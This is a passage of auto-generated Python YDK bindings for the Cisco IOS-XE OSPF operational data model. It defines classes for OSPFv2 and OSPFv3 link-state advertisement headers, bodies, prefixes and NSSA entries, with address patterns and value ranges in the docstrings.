'summary_mask', 'external_mask', 'body_flag_options'], name, value) class Network(Entity): """ Network details .. attribute:: network_mask IP network mask **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: attached_router List of the routers attached to the network **type**\: list of int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network, self).__init__() self.yang_name = "network" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('network_mask', (YLeaf(YType.str, 'network-mask'), ['str','str'])), ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])), ]) self.network_mask = None self.attached_router = [] self._segment_path = lambda: "network" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network, ['network_mask', 'attached_router'], name, value) class Ospfv2Link(Entity): """ Router LSA link .. attribute:: link_id (key) Link ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: link_data (key) Link data **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: type Link type **type**\: int **range:** 0..255 **config**\: False .. attribute:: ospfv2_topology Topology specific information **type**\: list of :py:class:`Ospfv2Topology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link, self).__init__() self.yang_name = "ospfv2-link" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['link_id','link_data'] self._child_classes = OrderedDict([("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology))]) self._leafs = OrderedDict([ ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])), ('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])), ('type', (YLeaf(YType.uint8, 'type'), ['int'])), ]) self.link_id = None self.link_data = None self.type = None self.ospfv2_topology = YList(self) self._segment_path = lambda: "ospfv2-link" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link, ['link_id', 'link_data', 'type'], name, value) class Ospfv2Topology(Entity): """ Topology specific information .. attribute:: mt_id (key) MT\-ID for topology enabled link **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: metric Metric for the topology **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology, self).__init__() self.yang_name = "ospfv2-topology" self.yang_parent_name = "ospfv2-link" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.mt_id = None self.metric = None self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology, ['mt_id', 'metric'], name, value) class Ospfv2Topology(Entity): """ Summary LSA .. attribute:: mt_id (key) MT\-ID for topology enabled link **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: metric Metric for the topology **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Topology, self).__init__() self.yang_name = "ospfv2-topology" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.mt_id = None self.metric = None self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Topology, ['mt_id', 'metric'], name, value) class Ospfv2External(Entity): """ External LSA .. attribute:: mt_id (key) MT\-ID for topology enabled on the link **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: metric Metric for the topology **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: forwarding_address Forwarding address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: external_route_tag Route tag **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2External, self).__init__() self.yang_name = "ospfv2-external" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ]) self.mt_id = None self.metric = None self.forwarding_address = None self.external_route_tag = None self._segment_path = lambda: "ospfv2-external" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2External, ['mt_id', 'metric', 'forwarding_address', 'external_route_tag'], name, value) class Ospfv3Lsa(Entity): """ OSPFv3 LSA .. attribute:: header Decoded OSPFv3 LSA header **type**\: :py:class:`Header <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header>` **config**\: False .. attribute:: lsa_body Decoded OSPFv3 LSA body **type**\: :py:class:`LsaBody <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa, self).__init__() self.yang_name = "ospfv3-lsa" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody))]) self._leafs = OrderedDict() self.header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header() self.header.parent = self self._children_name_map["header"] = "header" self.lsa_body = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody() self.lsa_body.parent = self self._children_name_map["lsa_body"] = "lsa-body" self._segment_path = lambda: "ospfv3-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa, [], name, value) class Header(Entity): """ Decoded OSPFv3 LSA header .. attribute:: lsa_id LSA ID **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: lsa_header LSA header **type**\: :py:class:`LsaHeader <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader>` **config**\: False .. attribute:: lsa_hdr_options OSPFv3 LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header, self).__init__() self.yang_name = "header" self.yang_parent_name = "ospfv3-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("lsa-header", ("lsa_header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader))]) self._leafs = OrderedDict([ ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])), ('lsa_hdr_options', (YLeaf(YType.bits, 'lsa-hdr-options'), ['Bits'])), ]) self.lsa_id = None self.lsa_hdr_options = Bits() self.lsa_header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader() self.lsa_header.parent = self self._children_name_map["lsa_header"] = "lsa-header" self._segment_path = lambda: "header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header, ['lsa_id', 'lsa_hdr_options'], name, value) class LsaHeader(Entity): """ LSA header .. attribute:: age LSA age **type**\: int **range:** 0..65535 **config**\: False .. attribute:: type LSA type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: adv_router LSA advertising router **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: seq_num LSA sequence number **type**\: str **config**\: False .. attribute:: checksum LSA checksum **type**\: str **config**\: False .. attribute:: length LSA length **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader, self).__init__() self.yang_name = "lsa-header" self.yang_parent_name = "header" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('age', (YLeaf(YType.uint16, 'age'), ['int'])), ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])), ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])), ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ]) self.age = None self.type = None self.adv_router = None self.seq_num = None self.checksum = None self.length = None self._segment_path = lambda: "lsa-header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader, ['age', 'type', 'adv_router', 'seq_num', 'checksum', 'length'], name, value) class LsaBody(Entity): """ Decoded OSPFv3 LSA body .. attribute:: network OSPFv3 network **type**\: :py:class:`Network <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network>` **config**\: False .. attribute:: prefix OSPFv3 inter area prefix **type**\: :py:class:`Prefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix>` **config**\: False .. attribute:: ia_router OSPFv3 inter area router **type**\: :py:class:`IaRouter <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter>` **config**\: False .. attribute:: lsa_external OSPFv3 LSA external **type**\: :py:class:`LsaExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal>` **config**\: False .. attribute:: nssa OSPFv3 NSSA **type**\: :py:class:`Nssa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa>` **config**\: False .. attribute:: link_data OSPFv3 Link data **type**\: :py:class:`LinkData <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData>` **config**\: False .. attribute:: ia_prefix OSPFv3 Intra area prefixes **type**\: :py:class:`IaPrefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix>` **config**\: False .. attribute:: lsa_flag_options LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False .. attribute:: lsa_body_flags LSA Body Flags **type**\: :py:class:`Ospfv3LsaBodyFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaBodyFlagOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody, self).__init__() self.yang_name = "lsa-body" self.yang_parent_name = "ospfv3-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network)), ("prefix", ("prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix)), ("ia-router", ("ia_router", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter)), ("lsa-external", ("lsa_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal)), ("nssa", ("nssa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa)), ("link-data", ("link_data", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData)), ("ia-prefix", ("ia_prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix))]) self._leafs = OrderedDict([ ('lsa_flag_options', (YLeaf(YType.bits, 'lsa-flag-options'), ['Bits'])), ('lsa_body_flags', (YLeaf(YType.bits, 'lsa-body-flags'), ['Bits'])), ]) self.lsa_flag_options = Bits() self.lsa_body_flags = Bits() self.network = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network() self.network.parent = self self._children_name_map["network"] = "network" self.prefix = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix() self.prefix.parent = self self._children_name_map["prefix"] = "prefix" self.ia_router = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter() self.ia_router.parent = self self._children_name_map["ia_router"] = "ia-router" self.lsa_external = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal() self.lsa_external.parent = self self._children_name_map["lsa_external"] = "lsa-external" self.nssa = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa() self.nssa.parent = self self._children_name_map["nssa"] = "nssa" self.link_data = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData() self.link_data.parent = self self._children_name_map["link_data"] = "link-data" self.ia_prefix = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix() self.ia_prefix.parent = self self._children_name_map["ia_prefix"] = "ia-prefix" self._segment_path = lambda: "lsa-body" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody, ['lsa_flag_options', 'lsa_body_flags'], name, value) class Network(Entity): """ OSPFv3 network .. attribute:: attached_router List of the routers attached to the network **type**\: list of int **range:** 0..4294967295 **config**\: False .. attribute:: lsa_net_options Network LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network, self).__init__() self.yang_name = "network" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])), ('lsa_net_options', (YLeaf(YType.bits, 'lsa-net-options'), ['Bits'])), ]) self.attached_router = [] self.lsa_net_options = Bits() self._segment_path = lambda: "network" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network, ['attached_router', 'lsa_net_options'], name, value) class Prefix(Entity): """ OSPFv3 inter area prefix .. attribute:: metric Metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: ia_prefix Inter area Prefix **type**\: str **config**\: False .. attribute:: ia_prefix_options Inter area prefix options **type**\: str **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix, self).__init__() self.yang_name = "prefix" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('ia_prefix', (YLeaf(YType.str, 'ia-prefix'), ['str'])), ('ia_prefix_options', (YLeaf(YType.str, 'ia-prefix-options'), ['str'])), ]) self.metric = None self.ia_prefix = None self.ia_prefix_options = None self._segment_path = lambda: "prefix" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix, ['metric', 'ia_prefix', 'ia_prefix_options'], name, value) class IaRouter(Entity): """ OSPFv3 inter area router .. attribute:: metric Metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: destination_router_id Router ID of the router being described by the LSA **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: lsa_ia_options Inter area LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter, self).__init__() self.yang_name = "ia-router" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('destination_router_id', (YLeaf(YType.uint32, 'destination-router-id'), ['int'])), ('lsa_ia_options', (YLeaf(YType.bits, 'lsa-ia-options'), ['Bits'])), ]) self.metric = None self.destination_router_id = None self.lsa_ia_options = Bits() self._segment_path = lambda: "ia-router" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter, ['metric', 'destination_router_id', 'lsa_ia_options'], name, value) class LsaExternal(Entity): """ OSPFv3 LSA external .. attribute:: metric Metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: flags LSA Flags **type**\: :py:class:`Flags <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags>` **config**\: False .. attribute:: referenced_ls_type Referenced Link State type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: external_prefix Prefix **type**\: str **config**\: False .. attribute:: external_prefix_options Prefix options **type**\: str **config**\: False .. attribute:: forwarding_address Forwarding address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: external_route_tag Route tag **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: referenced_link_state_id Referenced Link State ID **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal, self).__init__() self.yang_name = "lsa-external" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags))]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])), ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ]) self.metric = None self.referenced_ls_type = None self.external_prefix = None self.external_prefix_options = None self.forwarding_address = None self.external_route_tag = None self.referenced_link_state_id = None self.flags = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags() self.flags.parent = self self._children_name_map["flags"] = "flags" self._segment_path = lambda: "lsa-external" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value) class Flags(Entity): """ LSA Flags .. attribute:: e_flag When set, the metric specified is a Type 2 external metric **type**\: bool **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags, self).__init__() self.yang_name = "flags" self.yang_parent_name = "lsa-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])), ]) self.e_flag = None self._segment_path = lambda: "flags" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags, ['e_flag'], name, value) class Nssa(Entity): """ OSPFv3 NSSA .. attribute:: lsa_nssa_external NSSA LSA **type**\: :py:class:`LsaNssaExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa, self).__init__() self.yang_name = "nssa" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("lsa-nssa-external", ("lsa_nssa_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal))]) self._leafs = OrderedDict() self.lsa_nssa_external = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal() self.lsa_nssa_external.parent = self self._children_name_map["lsa_nssa_external"] = "lsa-nssa-external" self._segment_path = lambda: "nssa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa, [], name, value) class LsaNssaExternal(Entity): """ NSSA LSA .. attribute:: metric Metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: flags LSA Flags **type**\: :py:class:`Flags <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags>` **config**\: False .. attribute:: referenced_ls_type Referenced Link State type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: external_prefix Prefix **type**\: str **config**\: False .. attribute:: external_prefix_options Prefix options **type**\: str **config**\: False .. attribute:: forwarding_address 